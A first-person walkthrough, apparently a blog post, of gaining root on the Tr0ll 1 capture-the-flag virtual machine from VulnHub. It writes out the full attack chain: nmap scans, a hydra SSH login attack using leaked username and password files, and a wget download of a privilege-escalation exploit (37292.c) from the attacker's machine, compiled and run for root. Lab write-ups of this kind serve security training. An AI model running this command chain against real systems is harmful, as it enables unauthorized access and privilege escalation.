This is my walk through of how I gained root access to the Tr0ll 1 CTF image posted on vulnhub.com. Here we go —

Once the image loaded up,we need to figure out the IP address of the host.

nmap -sn -PE 192.168.1.200-254

Ok, so the host pulled .207 from DHCP.  Lets do a deeper scan.

nmap -p- -A 192.168.1.207

The nmap scan shows anonymous ftp open, port 80 and SSH.  The scan discovered a robots.txt file and a /secret directory.  Lets open a browser and see what we can find.

Connecting to the site just shows us an image.  Viewing the source doesn’t help us any here.

Next, I checked out the robots.txt file.

The robots.txt file only lists the /secret path which we saw in the nmap scan.  Lets check it out.

Nothing really helpful here. View-source doesn’t show us anything either.  So next I ran Nikto and didn’t really find anything of use.  So I decided to check out the anonymous FTP access.

I found a .pcap file on via FTP.  So I grabbed the file and opened it up in Wireshark.

As you can see in the screen shot, I found a reference to the sup3rs3cr3tdirlol.  It took me a bit to figure this out, but turns out it was a directory, and it contained a file.

I saved the file to my Kali machine.  I ran exiftool against the file, but didn’t find anything useful.

exiftool roflmao

So I made the file executable and tried to run it.  Tried a few other things.  This took me a VERY long time to figure out.  But I finally did.  There is a line in the strings output that references an address.

strings roflmao

This is actually a directory on the web server, which contains two additional directories.

Checking out the good_luck folder I found a txt file. I downloaded it and examined and I’m guessing this is a list of usernames.

cat which_one_lol.txt

Checking out the this_folder_contains_the_password folder.  Another file, Pass.txt.  I download it and take a look. A single password?

This took me a bit to figure out as well.  But the username is in the which_one file and the password is actually Pass.txt

hydra -L which_one_lol.txt -p Pass.txt 192.168.1.207 ssh

Now, lets SSH to the host and see what OS/kernel versions are being used.

Ok, so the host is running Ubuntu 14.04 and 3.13 Kernel.  Lets see if I can find any privilege escalation vulnerabilities for these versions.

searchsploit ubuntu 14.04

After doing a little research, 37292.c looks promising.  Lets download it to the host.

wget http://192.168.1.113/37292.c

Now lets compile and run it.

gcc 37292.c -o priv

./priv

Looks like it worked. We are able to get to the /root folder and read the proof.txt